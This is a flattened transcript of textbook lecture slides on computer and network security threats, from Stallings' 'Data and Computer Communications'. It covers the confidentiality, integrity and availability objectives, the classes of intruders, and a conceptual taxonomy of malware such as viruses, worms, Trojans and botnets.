23 network security threats pkg
TRANSCRIPT
Data and Computer Communications
Ninth Edition
by William Stallings
Chapter 23 – Computer and Network Security Threats
Data and Computer Communications, Ninth Edition by William Stallings, (c) Pearson
Education - Prentice Hall, 2011
Computer and Network Security Threats
The art of war teaches us to rely not on the likelihood of the enemy’s not coming, but on our own readiness to receive him; not on the change of his not attacking, but rather on the fact that we have made our position unassailable.
—The Art of War.
Sun Tzu
Computer Security
Key objectives: confidentiality integrity availability
Confidentiality term covers two related concepts:
Data• assures that private or confidential information is
not made available or disclosed to unauthorized individuals
Privacy• assures that individuals control or influence what
information related to them may be collected and stored and by whom and to whom that information may be disclosed
Integrity
term covers two related concepts: Data integrity
• assures that information and programs are changed only in a specified and authorized manner
System integrity• assures that a system performs its intended
function in an unimpaired manner, free from deliberate or inadvertent unauthorized manipulation of the system
Availability
Loss of Security
FIPS PUB 199 identifies the loss of security in each category: Confidentiality
• unauthorized disclosure of information Integrity
• unauthorized modification or destruction of information
Availability• disruption of access to or use of information or an
information system
Additional Security Objectives
Some information security professionals feel that two more objectives need to be added:
Threats and
Attacks
Computer and Network Assets, with Examples of Threats
Availability Confidentiality Integrity
Hardware Equipment is stolen or disabled, thus denying service.
Software Programs are deleted, denying access to users.
An unauthorized copy of software is made.
A working program is modified, either to cause it to fail during execution or to cause it to do some unintended task.
Data Files are deleted, denying access to users.
An unauthorized read of data is performed. An analysis of statistical data reveals underlying data.
Existing files are modified or new files are fabricated.
Communication Lines
Messages are destroyed or deleted. Communication lines or networks are rendered unavailable.
Messages are read. The traffic pattern of messages is observed.
Messages are modified, delayed, reordered, or duplicated. False messages are fabricated.
Scope of System Security
Hardware
most vulnerable to attack least susceptible to automated controls threats
accidental damage intentional damage theft
Software
includes operating system, utilities and application programs
key threats:
Data
security concerns with respect to data are broad, encompassing: availability secrecy integrity
major concerns with data have to do with:
Communication Lines & Networks
Network Security attack classification:
Active Attacks
Classes of Intruders
Masquerader – usually outsider penetrates a real users account by pretending
to be them Misfeasor – usually insider
legitimate user who accesses unauthorized areas
Clandestine User – outsider or insider user who seizes supervisory control of a
system in order to avoid prevention, access and detection controls
Behavior Patterns of Intruders:Hackers and Criminals
Hackers usually high level of competence share their findings look for targets of opportunity
Criminals organized groups of hackers are a common
modern threat typically young usually have specific targets
Behavior Patterns of Intruders:Insiders
Intrusion Techniques
Malicious Software
Categories of Malicious Software
parasitic fragments of programs that cannot exist
independently of some actual application program, utility, or system program• viruses, logic bombs, backdoors
independent self-contained programs that can be
scheduled and run by the operating system• worms, bots
Terminology
of Malicious Programs
Name Description
Virus Malware that, when executed, tries to replicate itself into other executable code; when it succeeds the code is said to be infected. When the infected code is executed, the virus also executes.
Worm A computer program that can run independently and can propagate a complete working version of itself onto other hosts on a network.
Logic bomb A program inserted into software by an intruder. A logic bomb lies dormant until a predefined condition is met; the program then triggers an unauthorized act.
Trojan horse A computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorizations of a system entity that invokes the Trojan horse program.
Backdoor (trapdoor) Any mechanisms that bypasses a normal security check; it may allow unauthorized access to functionality.
Mobile code Software (e.g., script, macro, or other portable instruction) that can be shipped unchanged to a heterogeneous collection of platforms and execute with identical semantics.
Exploits Code specific to a single vulnerability or set of vulnerabilities.
Downloaders Program that installs other items on a machine that is under attack. Usually, a downloader is sent in an e-mail.
Auto-rooter Malicious hacker tools used to break into new machines remotely.
Kit (virus generator) Set of tools for generating new viruses automatically.
Spammer programs Used to send large volumes of unwanted e-mail.
Flooders Used to attack networked computer systems with a large volume of traffic to carry out a denial-of-service (DoS) attack.
Keyloggers Captures keystrokes on a compromised system.
Rootkit Set of hacker tools used after attacker has broken into a computer system and gained root-level access.
Zombie, bot Program activated on an infected machine that is activated to launch attacks on other machines.
Spyware Software that collects information from a computer and transmits it to another system.
Adware Advertising that is integrated into software. It can result in pop-up ads or redirection of a browser to a commercial site.
Backdoor
trapdoor is a secret entry point into a program that can
allow unauthorized access to the data backdoors are common among the programming
community and are used for a variety of maintenance tasks (maintenance hook)
it is important to not allow backdoors into production environments
Logic Bomb
predates viruses and worms code embedded in a legitimate program
that will “explode” at a given time or when certain conditions are met presence or absence of certain files particular day of the week or date particular user using the application
BOOM
BOOM
Trojan Horse
program that contains hidden code that, when invoked, causes harm to the system or system infrastructure it was launched from
Mobile Code
script, macro, or other portable instruction that can be shipped unchanged to a collection of platforms
transmitted from a remote system to a local system and then executed on the local system without the user’s explicit instruction mechanism for a virus, worm, or Trojan horse vulnerabilities such as unauthorized data
access
Multiple Threat Malware
multipartite – capable of infecting multiple types of files
blended attack – uses multiple methods of infection or transmission to maximize infection speed Nimda
• erroneously referred to as simply a worm• uses a combination of items like email, web
servers, web clients, etc. to propagate and infect
Viruses
can do anything other programs can do attaches itself to a program and executes
secretly once running it can perform any function
allowed by the current users rights
Virus Lifecycle
Virus Classification
by target
by concealment strategy
Target boot sector infector
infects a master boot record or boot record and spreads when a system is booted from the disk containing the virus
file infector infects files that the operating system or shell
consider to be executable macro virus
infects files with macro code that is interpreted by an application
Concealment Strategy
E-Mail Viruses
a more recent development in malicious software Melissa
• E-mail virus sends itself to everyone on the mailing list in the user’s e-mail package
• virus does local damage on the user’s system
another virus appeared that activates by merely opening the e-mail that contains the virus rather than the attachment
Worms self replicating – usually very quickly usually performs some unwanted function actively seeks out more machines to infect
WormsIn the propagation phase the Worm will
Phases
Worm Technology
Multiplatform – variety of platforms Multi-Exploit – variety of penetration schemes Ultrafast Spreading – accelerated distribution Polymorphic – evades set signatures Metamorphic – evades anomaly detectors Transport Vehicles – used to spread other
distributed attack tools Zero Day – exploits a yet unknown vulnerability
Worm Propagation
Bots AKA – Zombie or Drone
secretly takes over an internet connected computer
launches attacks from that computer that are hard to trace back to the creator
Botnet collection of Bots that act in a coordinated
manner has 3 characteristics
• bot functionality• remote control facility• spreading mechanism
Bot Usage
Distributed Denial of Service Attack Spamming Sniffing Traffic Keylogging Spreading of new malware Installing Ads (Adware and SpyWare) Attacking IRC Chat networks Manipulation of online polls / games
Remote Control Facility
distinguishes a bot from a worm worm propagates itself, bot is controlled from
some central facility (initially) IRC server
all bots join a specific channel on this server and treat incoming messages as commands
control module activates the bots
Constructing the Attack Network
first step in a botnet attack is for the attacker to infect a number of machines with bot software that will be used to carry out the attack
essential ingredients software that can carry out the attack vulnerability in a large number of systems strategy for locating and identifying vulnerable
machines• scanning / fingerprinting
Summary
computer security concepts threats, attacks, and assets
hardware, software, data intruders
hackers, criminals, insiders malicious software
Trojan horse, malware viruses, worms, and bots